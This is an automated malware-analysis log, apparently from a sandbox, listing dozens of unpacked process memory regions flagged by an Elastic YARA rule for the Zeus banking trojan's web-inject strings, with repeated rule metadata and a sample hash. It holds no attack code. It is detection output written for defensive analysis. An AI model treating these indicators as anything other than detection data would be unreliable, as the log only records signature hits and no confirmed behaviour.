Source: 1.3.svchost.exe.39e0000.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 21.2.JbrLYfXaOpqnSngA.exe.2440000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.41.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 27.2.JbrLYfXaOpqnSngA.exe.2342000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 8.2.JbrLYfXaOpqnSngA.exe.1282000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.38.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 5.2.JbrLYfXaOpqnSngA.exe.2890000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.35.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 25.2.JbrLYfXaOpqnSngA.exe.1022000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 35.2.JbrLYfXaOpqnSngA.exe.2e92000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.39.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.2606c00.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 33.2.JbrLYfXaOpqnSngA.exe.2962000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.Bonelessness.exe.868460.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.39.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.42.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.30.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 35.2.JbrLYfXaOpqnSngA.exe.2e92000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 25.2.JbrLYfXaOpqnSngA.exe.1022000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.3c60000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.32.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.a00000.45.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.Bonelessness.exe.86e060.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.3c60000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.2.svchost.exe.407000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.a00000.45.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.3c60000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.31.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.3a80000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.43.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.2.svchost.exe.24c2000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.2.svchost.exe.2d20000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.2601000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.33.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.32.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.3c60000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.2.svchost.exe.2515c00.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 33.2.JbrLYfXaOpqnSngA.exe.2b40000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
